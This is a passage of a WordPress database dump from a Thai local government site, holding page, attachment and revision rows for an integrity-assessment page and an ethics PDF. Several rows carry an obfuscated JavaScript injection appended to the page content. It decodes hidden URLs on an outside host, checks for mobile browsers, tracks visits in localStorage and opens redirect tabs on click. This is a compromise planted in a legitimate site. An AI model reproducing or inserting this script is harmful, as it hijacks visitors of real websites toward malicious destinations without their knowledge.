_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 11:36:27','2024-08-20 04:36:27','',871,'http://pakhaeng.ssk.in.th/?p=898',0,'revision','',0),
(900,1,'2024-08-20 11:41:44','2024-08-20 04:41:44','<!-- wp:file {\"id\":901,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การขับเคลื่อนจริยธรรม-.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การขับเคลื่อนจริยธรรม-.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"การขับเคลื่อนจริยธรรม\"></object><a id=\"wp-block-file--media-bdeafa88-f42b-4e6a-a438-a1a421d3f8e5\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การขับเคลื่อนจริยธรรม-.pdf\">การขับเคลื่อนจริยธรรม</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การขับเคลื่อนจริยธรรม-.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-bdeafa88-f42b-4e6a-a438-a1a421d3f8e5\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การขับเคลื่อนจริยธรรม','','publish','closed','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%b1%e0%b8%9a%e0%b9%80%e0%b8%84%e0%b8%a5%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%99%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%a2%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1','','','2024-08-20 11:41:45','2024-08-20 04:41:45','',0,'http://pakhaeng.ssk.in.th/?page_id=900',0,'page','',0),
(901,1,'2024-08-20 11:41:34','2024-08-20 04:41:34','','การขับเคลื่อนจริยธรรม','','inherit','','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%b1%e0%b8%9a%e0%b9%80%e0%b8%84%e0%b8%a5%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%99%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%a2%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1','','','2024-08-20 11:41:34','2024-08-20 04:41:34','',900,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การขับเคลื่อนจริยธรรม-.pdf',0,'attachment','application/pdf',0),
(902,1,'2024-08-20 11:41:44','2024-08-20 04:41:44','<!-- wp:file {\"id\":901,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การขับเคลื่อนจริยธรรม-.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การขับเคลื่อนจริยธรรม-.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"การขับเคลื่อนจริยธรรม\"></object><a id=\"wp-block-file--media-bdeafa88-f42b-4e6a-a438-a1a421d3f8e5\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การขับเคลื่อนจริยธรรม-.pdf\">การขับเคลื่อนจริยธรรม</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การขับเคลื่อนจริยธรรม-.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-bdeafa88-f42b-4e6a-a438-a1a421d3f8e5\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การขับเคลื่อนจริยธรรม','','inherit','closed','closed','','900-revision-v1','','','2024-08-20 11:41:44','2024-08-20 04:41:44','',900,'http://pakhaeng.ssk.in.th/?p=902',0,'revision','',0),
(903,1,'2024-08-20 11:42:19','2024-08-20 04:42:19','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":4,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyI